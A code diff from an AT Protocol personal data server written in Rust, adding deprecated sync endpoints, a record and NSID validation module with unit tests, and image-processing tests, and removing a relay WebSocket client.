            Json(json!({"error": "HeadNotFound", "message": "Could not find root for DID"})),
        )
            .into_response(),
        Err(e) => {
            error!("DB error in get_head: {:?}", e);
            (
                StatusCode::INTERNAL_SERVER_ERROR,
                Json(json!({"error": "InternalError"})),
            )
                .into_response()
        }
    }
}
/// Query parameters for the deprecated `com.atproto.sync.getCheckout` endpoint.
#[derive(Deserialize)]
pub struct GetCheckoutParams {
    /// DID whose repo should be streamed as a CAR file.
    pub did: String,
}
pub async fn get_checkout(
State(state): State<AppState>,
Query(params): Query<GetCheckoutParams>,
) -> Response {
let did = params.did.trim();
if did.is_empty() {
return (
StatusCode::BAD_REQUEST,
Json(json!({"error": "InvalidRequest", "message": "did is required"})),
)
.into_response();
}
let repo_row = sqlx::query!(
r#"
SELECT r.repo_root_cid
FROM repos r
JOIN users u ON u.id = r.user_id
WHERE u.did = $1
"#,
did
)
.fetch_optional(&state.db)
.await
.unwrap_or(None);
let head_str = match repo_row {
Some(r) => r.repo_root_cid,
None => {
let user_exists = sqlx::query!("SELECT id FROM users WHERE did = $1", did)
.fetch_optional(&state.db)
.await
.unwrap_or(None);
if user_exists.is_none() {
return (
StatusCode::NOT_FOUND,
Json(json!({"error": "RepoNotFound", "message": "Repo not found"})),
)
.into_response();
} else {
return (
StatusCode::NOT_FOUND,
Json(json!({"error": "RepoNotFound", "message": "Repo not initialized"})),
)
.into_response();
}
}
};
let head_cid = match Cid::from_str(&head_str) {
Ok(c) => c,
Err(_) => {
return (
StatusCode::INTERNAL_SERVER_ERROR,
Json(json!({"error": "InternalError", "message": "Invalid head CID"})),
)
.into_response();
}
};
let mut car_bytes = match encode_car_header(&head_cid) {
Ok(h) => h,
Err(e) => {
return (
StatusCode::INTERNAL_SERVER_ERROR,
Json(json!({"error": "InternalError", "message": format!("Failed to encode CAR header: {}", e)})),
)
.into_response();
}
};
let mut stack = vec![head_cid];
let mut visited = std::collections::HashSet::new();
let mut remaining = MAX_REPO_BLOCKS_TRAVERSAL;
while let Some(cid) = stack.pop() {
if visited.contains(&cid) {
continue;
}
visited.insert(cid);
if remaining == 0 {
break;
}
remaining -= 1;
if let Ok(Some(block)) = state.block_store.get(&cid).await {
let cid_bytes = cid.to_bytes();
let total_len = cid_bytes.len() + block.len();
let mut writer = Vec::new();
crate::sync::car::write_varint(&mut writer, total_len as u64)
.expect("Writing to Vec<u8> should never fail");
writer.write_all(&cid_bytes)
.expect("Writing to Vec<u8> should never fail");
writer.write_all(&block)
.expect("Writing to Vec<u8> should never fail");
car_bytes.extend_from_slice(&writer);
if let Ok(value) = serde_ipld_dagcbor::from_slice::<Ipld>(&block) {
extract_links_ipld(&value, &mut stack);
}
}
}
(
StatusCode::OK,
[(axum::http::header::CONTENT_TYPE, "application/vnd.ipld.car")],
car_bytes,
)
.into_response()
}
/// Recursively collect every CID linked from an IPLD value onto `stack`,
/// descending through maps and lists; scalar values contribute nothing.
fn extract_links_ipld(value: &Ipld, stack: &mut Vec<Cid>) {
    match value {
        Ipld::Link(cid) => stack.push(*cid),
        Ipld::Map(entries) => {
            entries
                .values()
                .for_each(|child| extract_links_ipld(child, stack));
        }
        Ipld::List(items) => {
            items
                .iter()
                .for_each(|child| extract_links_ipld(child, stack));
        }
        _ => {}
    }
}

View File

@@ -2,11 +2,11 @@ pub mod blob;
pub mod car;
pub mod commit;
pub mod crawl;
pub mod deprecated;
pub mod firehose;
pub mod frame;
pub mod import;
pub mod listener;
pub mod relay_client;
pub mod repo;
pub mod subscribe_repos;
pub mod util;
@@ -15,6 +15,7 @@ pub mod verify;
pub use blob::{get_blob, list_blobs};
pub use commit::{get_latest_commit, get_repo_status, list_repos};
pub use crawl::{notify_of_update, request_crawl};
pub use repo::{get_blocks, get_repo, get_record};
pub use deprecated::{get_checkout, get_head};
pub use repo::{get_blocks, get_record, get_repo};
pub use subscribe_repos::subscribe_repos;
pub use verify::{CarVerifier, VerifiedCar, VerifyError};

View File

@@ -1,83 +0,0 @@
use crate::state::AppState;
use crate::sync::util::format_event_for_sending;
use futures::{sink::SinkExt, stream::StreamExt};
use std::time::Duration;
use tokio::sync::mpsc;
use tokio_tungstenite::{connect_async, tungstenite::Message};
use tracing::{error, info, warn};
/// Maintains a persistent WebSocket connection to a single firehose relay,
/// forwarding every event from the local firehose broadcast channel.
///
/// Reconnects forever with a fixed 5-second backoff. If `ready_tx` is
/// provided, one `()` is sent on it after each successful connect so a
/// caller can await first-connection readiness (see `start_relay_clients`).
async fn run_relay_client(state: AppState, url: String, ready_tx: Option<mpsc::Sender<()>>) {
    info!("Starting firehose client for relay: {}", url);
    loop {
        match connect_async(&url).await {
            Ok((mut ws_stream, _)) => {
                info!("Connected to firehose relay: {}", url);
                // Subscribe AFTER connecting so we only forward events that
                // occur while the connection is live.
                let mut rx = state.firehose_tx.subscribe();
                if let Some(tx) = ready_tx.as_ref() {
                    // Best-effort readiness signal; the receiver may already
                    // have been closed, which is fine.
                    tx.send(()).await.ok();
                }
                loop {
                    tokio::select! {
                        // Local firehose event: serialize and push to the relay.
                        Ok(event) = rx.recv() => {
                            match format_event_for_sending(&state, event).await {
                                Ok(bytes) => {
                                    if let Err(e) = ws_stream.send(Message::Binary(bytes.into())).await {
                                        warn!("Failed to send event to {}: {}. Disconnecting.", url, e);
                                        break;
                                    }
                                }
                                Err(e) => {
                                    // Serialization failure drops this event but
                                    // keeps the connection alive.
                                    error!("Failed to format event for relay {}: {}", url, e);
                                }
                            }
                        }
                        // Inbound traffic: only a Close frame matters; other
                        // frames (pings, etc.) are drained and ignored.
                        Some(msg) = ws_stream.next() => {
                            if let Ok(Message::Close(_)) = msg {
                                warn!("Relay {} closed connection.", url);
                                break;
                            }
                        }
                        // Both sources exhausted: leave the send loop.
                        else => break,
                    }
                }
            }
            Err(e) => {
                error!("Failed to connect to firehose relay {}: {}", url, e);
            }
        }
        warn!(
            "Disconnected from {}. Reconnecting in 5 seconds...",
            url
        );
        tokio::time::sleep(Duration::from_secs(5)).await;
    }
}
/// Spawns one background firehose client task per relay URL.
///
/// When `ready_rx` is supplied, it is closed as soon as the first relay
/// connection succeeds, so the caller can `recv()` on it to await readiness.
/// No tasks are spawned when `relays` is empty.
pub async fn start_relay_clients(
    state: AppState,
    relays: Vec<String>,
    mut ready_rx: Option<mpsc::Receiver<()>>,
) {
    if relays.is_empty() {
        return;
    }
    let (ready_tx, mut internal_ready_rx) = mpsc::channel(1);
    let want_ready_signal = ready_rx.is_some();
    for url in relays {
        // Only hand clients a sender when the caller actually asked to be
        // notified of the first successful connection.
        let notifier = want_ready_signal.then(|| ready_tx.clone());
        tokio::spawn(run_relay_client(state.clone(), url, notifier));
    }
    if let Some(mut caller_rx) = ready_rx.take() {
        tokio::spawn(async move {
            // First client to connect wakes us; closing the caller's receiver
            // propagates the readiness signal.
            let _ = internal_ready_rx.recv().await;
            caller_rx.close();
        });
    }
}

504
src/validation/mod.rs Normal file
View File

@@ -0,0 +1,504 @@
use serde_json::Value;
use thiserror::Error;
/// Errors raised while validating repository records, record keys, and
/// collection NSIDs.
#[derive(Debug, Error)]
pub enum ValidationError {
    /// The record object has no string `$type` field.
    #[error("No $type provided")]
    MissingType,
    /// The record's `$type` does not match the target collection.
    #[error("Invalid $type: expected {expected}, got {actual}")]
    TypeMismatch { expected: String, actual: String },
    /// A field required by the record's lexicon is absent.
    #[error("Missing required field: {0}")]
    MissingField(String),
    /// A field is present but violates a lexicon constraint.
    #[error("Invalid field value at {path}: {message}")]
    InvalidField { path: String, message: String },
    /// A datetime field failed RFC-3339 parsing.
    #[error("Invalid datetime format at {path}: must be RFC-3339/ISO-8601")]
    InvalidDatetime { path: String },
    /// The record (or key/NSID) is structurally invalid.
    #[error("Invalid record: {0}")]
    InvalidRecord(String),
    /// `$type` is not a known lexicon and strict mode is enabled.
    #[error("Unknown record type: {0}")]
    UnknownType(String),
}
/// Outcome of validating a record.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum ValidationStatus {
    /// Record matched a known lexicon and passed all checks.
    Valid,
    /// `$type` is not a known lexicon; only generic checks were applied.
    Unknown,
    /// Record failed validation. Not produced by `RecordValidator::validate`
    /// in this module (it returns `Err` instead); presumably used by callers
    /// that map errors to a status — verify at call sites.
    Invalid,
}
/// Validates records against built-in rules for known `app.bsky.*` lexicons.
pub struct RecordValidator {
    // When true, records whose `$type` has no built-in validator are rejected
    // with `UnknownType` instead of passing through as `Unknown`.
    require_lexicon: bool,
}
impl Default for RecordValidator {
    /// Equivalent to `RecordValidator::new()`: lenient mode, unknown types
    /// are allowed through as `ValidationStatus::Unknown`.
    fn default() -> Self {
        Self::new()
    }
}
impl RecordValidator {
    /// Creates a lenient validator: unknown record types pass through as
    /// `ValidationStatus::Unknown`.
    pub fn new() -> Self {
        Self {
            require_lexicon: false,
        }
    }
    /// Builder-style toggle. When `require` is true, records whose `$type`
    /// has no built-in validator are rejected with `UnknownType`.
    pub fn require_lexicon(mut self, require: bool) -> Self {
        self.require_lexicon = require;
        self
    }
    /// Validates `record` against the rules for `collection`.
    ///
    /// Generic checks first: the record must be a JSON object, its `$type`
    /// must equal `collection`, and a top-level string `createdAt` (if any)
    /// must be RFC-3339. Then dispatches to the per-type validator. Known
    /// types return `Valid`; unknown types return `Unknown` unless
    /// `require_lexicon` is set.
    ///
    /// # Errors
    /// Returns the first `ValidationError` encountered.
    pub fn validate(
        &self,
        record: &Value,
        collection: &str,
    ) -> Result<ValidationStatus, ValidationError> {
        let obj = record
            .as_object()
            .ok_or_else(|| ValidationError::InvalidRecord("Record must be an object".to_string()))?;
        let record_type = obj
            .get("$type")
            .and_then(|v| v.as_str())
            .ok_or(ValidationError::MissingType)?;
        if record_type != collection {
            return Err(ValidationError::TypeMismatch {
                expected: collection.to_string(),
                actual: record_type.to_string(),
            });
        }
        // Only checked when createdAt is a string here; per-type validators
        // still enforce its presence where the lexicon requires it.
        if let Some(created_at) = obj.get("createdAt").and_then(|v| v.as_str()) {
            validate_datetime(created_at, "createdAt")?;
        }
        match record_type {
            "app.bsky.feed.post" => self.validate_post(obj)?,
            "app.bsky.actor.profile" => self.validate_profile(obj)?,
            "app.bsky.feed.like" => self.validate_like(obj)?,
            "app.bsky.feed.repost" => self.validate_repost(obj)?,
            "app.bsky.graph.follow" => self.validate_follow(obj)?,
            "app.bsky.graph.block" => self.validate_block(obj)?,
            "app.bsky.graph.list" => self.validate_list(obj)?,
            "app.bsky.graph.listitem" => self.validate_list_item(obj)?,
            "app.bsky.feed.generator" => self.validate_feed_generator(obj)?,
            "app.bsky.feed.threadgate" => self.validate_threadgate(obj)?,
            "app.bsky.labeler.service" => self.validate_labeler_service(obj)?,
            _ => {
                if self.require_lexicon {
                    return Err(ValidationError::UnknownType(record_type.to_string()));
                }
                return Ok(ValidationStatus::Unknown);
            }
        }
        Ok(ValidationStatus::Valid)
    }
    /// `app.bsky.feed.post`: requires `text` and `createdAt`; caps text
    /// length, `langs` count (3), and `tags` count (8) / tag size (640 bytes).
    fn validate_post(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
        if !obj.contains_key("text") {
            return Err(ValidationError::MissingField("text".to_string()));
        }
        if !obj.contains_key("createdAt") {
            return Err(ValidationError::MissingField("createdAt".to_string()));
        }
        if let Some(text) = obj.get("text").and_then(|v| v.as_str()) {
            // NOTE(review): chars().count() counts Unicode scalar values, not
            // grapheme clusters, despite the variable name — confirm which
            // unit the 3000 limit is intended in.
            let grapheme_count = text.chars().count();
            if grapheme_count > 3000 {
                return Err(ValidationError::InvalidField {
                    path: "text".to_string(),
                    message: format!("Text exceeds maximum length of 3000 characters (got {})", grapheme_count),
                });
            }
        }
        if let Some(langs) = obj.get("langs").and_then(|v| v.as_array()) {
            if langs.len() > 3 {
                return Err(ValidationError::InvalidField {
                    path: "langs".to_string(),
                    message: "Maximum 3 languages allowed".to_string(),
                });
            }
        }
        if let Some(tags) = obj.get("tags").and_then(|v| v.as_array()) {
            if tags.len() > 8 {
                return Err(ValidationError::InvalidField {
                    path: "tags".to_string(),
                    message: "Maximum 8 tags allowed".to_string(),
                });
            }
            for (i, tag) in tags.iter().enumerate() {
                if let Some(tag_str) = tag.as_str() {
                    // len() here is a byte length, matching the message.
                    if tag_str.len() > 640 {
                        return Err(ValidationError::InvalidField {
                            path: format!("tags/{}", i),
                            message: "Tag exceeds maximum length of 640 bytes".to_string(),
                        });
                    }
                }
            }
        }
        Ok(())
    }
    /// `app.bsky.actor.profile`: all fields optional; caps displayName and
    /// description lengths when present.
    fn validate_profile(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
        if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) {
            // NOTE(review): scalar-value count, not true graphemes — see
            // validate_post.
            let grapheme_count = display_name.chars().count();
            if grapheme_count > 640 {
                return Err(ValidationError::InvalidField {
                    path: "displayName".to_string(),
                    message: format!("Display name exceeds maximum length of 640 characters (got {})", grapheme_count),
                });
            }
        }
        if let Some(description) = obj.get("description").and_then(|v| v.as_str()) {
            let grapheme_count = description.chars().count();
            if grapheme_count > 2560 {
                return Err(ValidationError::InvalidField {
                    path: "description".to_string(),
                    message: format!("Description exceeds maximum length of 2560 characters (got {})", grapheme_count),
                });
            }
        }
        Ok(())
    }
    /// `app.bsky.feed.like`: requires `createdAt` and a strong ref `subject`.
    fn validate_like(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
        if !obj.contains_key("subject") {
            return Err(ValidationError::MissingField("subject".to_string()));
        }
        if !obj.contains_key("createdAt") {
            return Err(ValidationError::MissingField("createdAt".to_string()));
        }
        self.validate_strong_ref(obj.get("subject"), "subject")?;
        Ok(())
    }
    /// `app.bsky.feed.repost`: same shape as a like.
    fn validate_repost(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
        if !obj.contains_key("subject") {
            return Err(ValidationError::MissingField("subject".to_string()));
        }
        if !obj.contains_key("createdAt") {
            return Err(ValidationError::MissingField("createdAt".to_string()));
        }
        self.validate_strong_ref(obj.get("subject"), "subject")?;
        Ok(())
    }
    /// `app.bsky.graph.follow`: requires `createdAt` and a DID `subject`.
    fn validate_follow(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
        if !obj.contains_key("subject") {
            return Err(ValidationError::MissingField("subject".to_string()));
        }
        if !obj.contains_key("createdAt") {
            return Err(ValidationError::MissingField("createdAt".to_string()));
        }
        if let Some(subject) = obj.get("subject").and_then(|v| v.as_str()) {
            if !subject.starts_with("did:") {
                return Err(ValidationError::InvalidField {
                    path: "subject".to_string(),
                    message: "Subject must be a DID".to_string(),
                });
            }
        }
        Ok(())
    }
    /// `app.bsky.graph.block`: requires `createdAt` and a DID `subject`.
    fn validate_block(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
        if !obj.contains_key("subject") {
            return Err(ValidationError::MissingField("subject".to_string()));
        }
        if !obj.contains_key("createdAt") {
            return Err(ValidationError::MissingField("createdAt".to_string()));
        }
        if let Some(subject) = obj.get("subject").and_then(|v| v.as_str()) {
            if !subject.starts_with("did:") {
                return Err(ValidationError::InvalidField {
                    path: "subject".to_string(),
                    message: "Subject must be a DID".to_string(),
                });
            }
        }
        Ok(())
    }
    /// `app.bsky.graph.list`: requires `name` (1-64 bytes), `purpose`,
    /// and `createdAt`.
    fn validate_list(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
        if !obj.contains_key("name") {
            return Err(ValidationError::MissingField("name".to_string()));
        }
        if !obj.contains_key("purpose") {
            return Err(ValidationError::MissingField("purpose".to_string()));
        }
        if !obj.contains_key("createdAt") {
            return Err(ValidationError::MissingField("createdAt".to_string()));
        }
        if let Some(name) = obj.get("name").and_then(|v| v.as_str()) {
            // NOTE(review): len() is bytes while the message says characters;
            // they differ for non-ASCII names.
            if name.is_empty() || name.len() > 64 {
                return Err(ValidationError::InvalidField {
                    path: "name".to_string(),
                    message: "Name must be 1-64 characters".to_string(),
                });
            }
        }
        Ok(())
    }
    /// `app.bsky.graph.listitem`: presence-only checks for `subject`,
    /// `list`, and `createdAt`.
    fn validate_list_item(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
        if !obj.contains_key("subject") {
            return Err(ValidationError::MissingField("subject".to_string()));
        }
        if !obj.contains_key("list") {
            return Err(ValidationError::MissingField("list".to_string()));
        }
        if !obj.contains_key("createdAt") {
            return Err(ValidationError::MissingField("createdAt".to_string()));
        }
        Ok(())
    }
    /// `app.bsky.feed.generator`: requires `did`, `createdAt`, and a
    /// `displayName` of 1-240 bytes.
    fn validate_feed_generator(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
        if !obj.contains_key("did") {
            return Err(ValidationError::MissingField("did".to_string()));
        }
        if !obj.contains_key("displayName") {
            return Err(ValidationError::MissingField("displayName".to_string()));
        }
        if !obj.contains_key("createdAt") {
            return Err(ValidationError::MissingField("createdAt".to_string()));
        }
        if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) {
            if display_name.is_empty() || display_name.len() > 240 {
                return Err(ValidationError::InvalidField {
                    path: "displayName".to_string(),
                    message: "displayName must be 1-240 characters".to_string(),
                });
            }
        }
        Ok(())
    }
    /// `app.bsky.feed.threadgate`: presence-only checks for `post` and
    /// `createdAt`.
    fn validate_threadgate(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
        if !obj.contains_key("post") {
            return Err(ValidationError::MissingField("post".to_string()));
        }
        if !obj.contains_key("createdAt") {
            return Err(ValidationError::MissingField("createdAt".to_string()));
        }
        Ok(())
    }
    /// `app.bsky.labeler.service`: presence-only checks for `policies` and
    /// `createdAt`.
    fn validate_labeler_service(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
        if !obj.contains_key("policies") {
            return Err(ValidationError::MissingField("policies".to_string()));
        }
        if !obj.contains_key("createdAt") {
            return Err(ValidationError::MissingField("createdAt".to_string()));
        }
        Ok(())
    }
    /// Validates a strong reference: an object with `uri` (an `at://` URI)
    /// and `cid` keys. `path` is used only for error reporting.
    fn validate_strong_ref(&self, value: Option<&Value>, path: &str) -> Result<(), ValidationError> {
        let obj = value
            .and_then(|v| v.as_object())
            .ok_or_else(|| ValidationError::InvalidField {
                path: path.to_string(),
                message: "Must be a strong reference object".to_string(),
            })?;
        if !obj.contains_key("uri") {
            return Err(ValidationError::MissingField(format!("{}/uri", path)));
        }
        if !obj.contains_key("cid") {
            return Err(ValidationError::MissingField(format!("{}/cid", path)));
        }
        if let Some(uri) = obj.get("uri").and_then(|v| v.as_str()) {
            if !uri.starts_with("at://") {
                return Err(ValidationError::InvalidField {
                    path: format!("{}/uri", path),
                    message: "URI must be an at:// URI".to_string(),
                });
            }
        }
        Ok(())
    }
}
/// Ensures `value` parses as an RFC-3339 timestamp; `path` is reported in
/// the error when it does not.
fn validate_datetime(value: &str, path: &str) -> Result<(), ValidationError> {
    chrono::DateTime::parse_from_rfc3339(value)
        .map(|_| ())
        .map_err(|_| ValidationError::InvalidDatetime {
            path: path.to_string(),
        })
}
/// Validates an AT Protocol record key (rkey).
///
/// Per the atproto record-key specification a key is 1-512 characters from
/// the set `[A-Za-z0-9.-_:~]`, and the literal values "." and ".." are
/// forbidden.
///
/// # Errors
/// Returns `ValidationError::InvalidRecord` describing the first rule
/// violated.
pub fn validate_record_key(rkey: &str) -> Result<(), ValidationError> {
    if rkey.is_empty() {
        return Err(ValidationError::InvalidRecord("Record key cannot be empty".to_string()));
    }
    if rkey.len() > 512 {
        return Err(ValidationError::InvalidRecord("Record key exceeds maximum length of 512".to_string()));
    }
    if rkey == "." || rkey == ".." {
        return Err(ValidationError::InvalidRecord("Record key cannot be '.' or '..'".to_string()));
    }
    // The spec's character set includes ':' (used by namespaced keys), which
    // the previous implementation incorrectly rejected.
    let valid_chars = rkey
        .chars()
        .all(|c| c.is_ascii_alphanumeric() || matches!(c, '.' | '-' | '_' | '~' | ':'));
    if !valid_chars {
        return Err(ValidationError::InvalidRecord(
            "Record key contains invalid characters (must be alphanumeric, '.', '-', '_', '~', or ':')".to_string()
        ));
    }
    Ok(())
}
/// Validates a collection NSID (e.g. `app.bsky.feed.post`).
///
/// Enforces the structural rules from the atproto NSID specification: at
/// least three dot-separated segments, overall length at most 317
/// characters, and each segment 1-63 ASCII alphanumeric/hyphen characters
/// that neither starts nor ends with a hyphen.
///
/// # Errors
/// Returns `ValidationError::InvalidRecord` describing the first rule
/// violated.
pub fn validate_collection_nsid(collection: &str) -> Result<(), ValidationError> {
    if collection.is_empty() {
        return Err(ValidationError::InvalidRecord("Collection NSID cannot be empty".to_string()));
    }
    // Spec cap on the full NSID; previously unbounded input was accepted.
    if collection.len() > 317 {
        return Err(ValidationError::InvalidRecord(
            "Collection NSID exceeds maximum length of 317".to_string()
        ));
    }
    let parts: Vec<&str> = collection.split('.').collect();
    if parts.len() < 3 {
        return Err(ValidationError::InvalidRecord(
            "Collection NSID must have at least 3 segments".to_string()
        ));
    }
    for part in &parts {
        if part.is_empty() {
            return Err(ValidationError::InvalidRecord(
                "Collection NSID segments cannot be empty".to_string()
            ));
        }
        if part.len() > 63 {
            return Err(ValidationError::InvalidRecord(
                "Collection NSID segments cannot exceed 63 characters".to_string()
            ));
        }
        if !part.chars().all(|c| c.is_ascii_alphanumeric() || c == '-') {
            return Err(ValidationError::InvalidRecord(
                "Collection NSID segments must be alphanumeric or hyphens".to_string()
            ));
        }
        // Hyphens are interior-only per the NSID grammar.
        if part.starts_with('-') || part.ends_with('-') {
            return Err(ValidationError::InvalidRecord(
                "Collection NSID segments cannot start or end with a hyphen".to_string()
            ));
        }
    }
    Ok(())
}
#[cfg(test)]
mod tests {
    use super::*;
    use serde_json::json;
    // A well-formed post with text and an RFC-3339 createdAt validates as Valid.
    #[test]
    fn test_validate_post() {
        let validator = RecordValidator::new();
        let valid_post = json!({
            "$type": "app.bsky.feed.post",
            "text": "Hello, world!",
            "createdAt": "2024-01-01T00:00:00.000Z"
        });
        assert_eq!(
            validator.validate(&valid_post, "app.bsky.feed.post").unwrap(),
            ValidationStatus::Valid
        );
    }
    // A post without the required `text` field is rejected.
    #[test]
    fn test_validate_post_missing_text() {
        let validator = RecordValidator::new();
        let invalid_post = json!({
            "$type": "app.bsky.feed.post",
            "createdAt": "2024-01-01T00:00:00.000Z"
        });
        assert!(validator.validate(&invalid_post, "app.bsky.feed.post").is_err());
    }
    // `$type` must match the target collection exactly.
    #[test]
    fn test_validate_type_mismatch() {
        let validator = RecordValidator::new();
        let record = json!({
            "$type": "app.bsky.feed.like",
            "subject": {"uri": "at://did:plc:test/app.bsky.feed.post/123", "cid": "bafyrei..."},
            "createdAt": "2024-01-01T00:00:00.000Z"
        });
        let result = validator.validate(&record, "app.bsky.feed.post");
        assert!(matches!(result, Err(ValidationError::TypeMismatch { .. })));
    }
    // Lenient mode: unrecognized lexicons pass through as Unknown.
    #[test]
    fn test_validate_unknown_type() {
        let validator = RecordValidator::new();
        let record = json!({
            "$type": "com.example.custom",
            "data": "test"
        });
        assert_eq!(
            validator.validate(&record, "com.example.custom").unwrap(),
            ValidationStatus::Unknown
        );
    }
    // Strict mode (require_lexicon): unrecognized lexicons are errors.
    #[test]
    fn test_validate_unknown_type_strict() {
        let validator = RecordValidator::new().require_lexicon(true);
        let record = json!({
            "$type": "com.example.custom",
            "data": "test"
        });
        let result = validator.validate(&record, "com.example.custom");
        assert!(matches!(result, Err(ValidationError::UnknownType(_))));
    }
    // Record keys: allowed charset, forbidden "."/".."/empty, no slashes.
    #[test]
    fn test_validate_record_key() {
        assert!(validate_record_key("valid-key_123").is_ok());
        assert!(validate_record_key("3k2n5j2").is_ok());
        assert!(validate_record_key(".").is_err());
        assert!(validate_record_key("..").is_err());
        assert!(validate_record_key("").is_err());
        assert!(validate_record_key("invalid/key").is_err());
    }
    // NSIDs require at least three non-empty dot-separated segments.
    #[test]
    fn test_validate_collection_nsid() {
        assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
        assert!(validate_collection_nsid("com.atproto.repo.record").is_ok());
        assert!(validate_collection_nsid("invalid").is_err());
        assert!(validate_collection_nsid("a.b").is_err());
        assert!(validate_collection_nsid("").is_err());
    }
}

315
tests/image_processing.rs Normal file
View File

@@ -0,0 +1,315 @@
use bspds::image::{ImageProcessor, ImageError, OutputFormat, THUMB_SIZE_FEED, THUMB_SIZE_FULL, DEFAULT_MAX_FILE_SIZE};
use image::{DynamicImage, ImageFormat};
use std::io::Cursor;
fn create_test_png(width: u32, height: u32) -> Vec<u8> {
let img = DynamicImage::new_rgb8(width, height);
let mut buf = Vec::new();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
buf
}
fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> {
let img = DynamicImage::new_rgb8(width, height);
let mut buf = Vec::new();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg).unwrap();
buf
}
fn create_test_gif(width: u32, height: u32) -> Vec<u8> {
let img = DynamicImage::new_rgb8(width, height);
let mut buf = Vec::new();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif).unwrap();
buf
}
fn create_test_webp(width: u32, height: u32) -> Vec<u8> {
let img = DynamicImage::new_rgb8(width, height);
let mut buf = Vec::new();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP).unwrap();
buf
}
// Round-trip decode checks: process() must report the original dimensions
// for each supported input format.
#[test]
fn test_process_png() {
    let processor = ImageProcessor::new();
    let data = create_test_png(500, 500);
    let result = processor.process(&data, "image/png").unwrap();
    assert_eq!(result.original.width, 500);
    assert_eq!(result.original.height, 500);
}
#[test]
fn test_process_jpeg() {
    let processor = ImageProcessor::new();
    let data = create_test_jpeg(400, 300);
    let result = processor.process(&data, "image/jpeg").unwrap();
    assert_eq!(result.original.width, 400);
    assert_eq!(result.original.height, 300);
}
#[test]
fn test_process_gif() {
    let processor = ImageProcessor::new();
    let data = create_test_gif(200, 200);
    let result = processor.process(&data, "image/gif").unwrap();
    assert_eq!(result.original.width, 200);
    assert_eq!(result.original.height, 200);
}
#[test]
fn test_process_webp() {
    let processor = ImageProcessor::new();
    let data = create_test_webp(300, 200);
    let result = processor.process(&data, "image/webp").unwrap();
    assert_eq!(result.original.width, 300);
    assert_eq!(result.original.height, 200);
}
// Thumbnail generation: images larger than a tier's threshold get a
// thumbnail bounded by that tier; small images get none.
#[test]
fn test_thumbnail_feed_size() {
    let processor = ImageProcessor::new();
    let data = create_test_png(800, 600);
    let result = processor.process(&data, "image/png").unwrap();
    let thumb = result.thumbnail_feed.expect("Should generate feed thumbnail for large image");
    assert!(thumb.width <= THUMB_SIZE_FEED);
    assert!(thumb.height <= THUMB_SIZE_FEED);
}
#[test]
fn test_thumbnail_full_size() {
    let processor = ImageProcessor::new();
    let data = create_test_png(2000, 1500);
    let result = processor.process(&data, "image/png").unwrap();
    let thumb = result.thumbnail_full.expect("Should generate full thumbnail for large image");
    assert!(thumb.width <= THUMB_SIZE_FULL);
    assert!(thumb.height <= THUMB_SIZE_FULL);
}
#[test]
fn test_no_thumbnail_small_image() {
    let processor = ImageProcessor::new();
    let data = create_test_png(100, 100);
    let result = processor.process(&data, "image/png").unwrap();
    assert!(result.thumbnail_feed.is_none(), "Small image should not get feed thumbnail");
    assert!(result.thumbnail_full.is_none(), "Small image should not get full thumbnail");
}
// Output-format selection: with_output_format() controls the MIME type of
// the processed original regardless of the input format.
#[test]
fn test_webp_conversion() {
    let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
    let data = create_test_png(300, 300);
    let result = processor.process(&data, "image/png").unwrap();
    assert_eq!(result.original.mime_type, "image/webp");
}
#[test]
fn test_jpeg_output_format() {
    let processor = ImageProcessor::new().with_output_format(OutputFormat::Jpeg);
    let data = create_test_png(300, 300);
    let result = processor.process(&data, "image/png").unwrap();
    assert_eq!(result.original.mime_type, "image/jpeg");
}
#[test]
fn test_png_output_format() {
    let processor = ImageProcessor::new().with_output_format(OutputFormat::Png);
    let data = create_test_jpeg(300, 300);
    let result = processor.process(&data, "image/jpeg").unwrap();
    assert_eq!(result.original.mime_type, "image/png");
}
// Size-limit enforcement: dimension and byte-size caps surface as typed
// errors carrying the offending and configured values.
#[test]
fn test_max_dimension_enforced() {
    let processor = ImageProcessor::new().with_max_dimension(1000);
    let data = create_test_png(2000, 2000);
    let result = processor.process(&data, "image/png");
    assert!(matches!(result, Err(ImageError::TooLarge { .. })));
    if let Err(ImageError::TooLarge { width, height, max_dimension }) = result {
        assert_eq!(width, 2000);
        assert_eq!(height, 2000);
        assert_eq!(max_dimension, 1000);
    }
}
#[test]
fn test_file_size_limit() {
    let processor = ImageProcessor::new().with_max_file_size(100);
    let data = create_test_png(500, 500);
    let result = processor.process(&data, "image/png");
    assert!(matches!(result, Err(ImageError::FileTooLarge { .. })));
    if let Err(ImageError::FileTooLarge { size, max_size }) = result {
        assert!(size > 100);
        assert_eq!(max_size, 100);
    }
}
// Pins the library default (10 MiB) so silent changes are caught.
#[test]
fn test_default_max_file_size() {
    assert_eq!(DEFAULT_MAX_FILE_SIZE, 10 * 1024 * 1024);
}
// Error handling for bad input bytes: non-image data is UnsupportedFormat,
// a valid magic number with garbage payload is DecodeError.
#[test]
fn test_unsupported_format_rejected() {
    let processor = ImageProcessor::new();
    let data = b"this is not an image";
    let result = processor.process(data, "application/octet-stream");
    assert!(matches!(result, Err(ImageError::UnsupportedFormat(_))));
}
#[test]
fn test_corrupted_image_handling() {
    let processor = ImageProcessor::new();
    let data = b"\x89PNG\r\n\x1a\ncorrupted data here";
    let result = processor.process(data, "image/png");
    assert!(matches!(result, Err(ImageError::DecodeError(_))));
}
